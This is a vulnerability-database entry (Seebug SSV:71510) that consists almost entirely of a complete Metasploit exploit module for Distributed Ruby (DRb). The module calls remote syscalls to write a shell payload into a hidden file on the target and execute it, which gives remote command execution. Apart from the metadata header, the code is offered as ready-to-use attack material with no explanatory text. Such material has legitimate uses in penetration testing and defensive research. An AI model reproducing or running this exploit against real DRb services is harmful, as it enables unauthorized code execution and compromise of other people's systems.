Distributed Ruby send syscall vulnerability

2014-07-01T00:00:00
ID SSV:71510
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'
require 'drb/drb'
class Metasploit3 < Msf::Exploit::Remote

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Distributed Ruby send syscall vulnerability.',
			'Description'    => %q{ This module exploits remote syscalls in DRuby
			},
			'Author'         => [ 'joernchen <joernchen@phenoelit.de> (Phenoelit)' ],
			'License'        => MSF_LICENSE,
			'Version'        => '',
			'References'     =>
				[
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      => 
						{
							'PayloadType' => 'cmd',
						},
					'Space'       => 32768,
				},
			'Platform'       => 'linux',
			'Arch'           => ARCH_ALL,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget' => 0))

			
			register_options(
				[
					OptString.new('URI', [true, "The druby URI of the target host ", ""]),
				], self.class)
	end

	def exploit
		serveruri = datastore['URI'] 
		DRb.start_service	
		p = DRbObject.new_with_uri(serveruri)
		class << p
			undef :send
		end
		filename = "." + Rex::Text.rand_text_alphanumeric(16)
		# syscall open
		i =  p.send(:syscall,8,filename,0700)
		#syscall write
		p.send(:syscall,4,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
		#syscall close
		p.send(:syscall,6,i)
		#syscall fork
		p.send(:syscall,2)
		#syscall execve
		p.send(:syscall,11,filename,0,0)
	
		handler(nil)
	end
end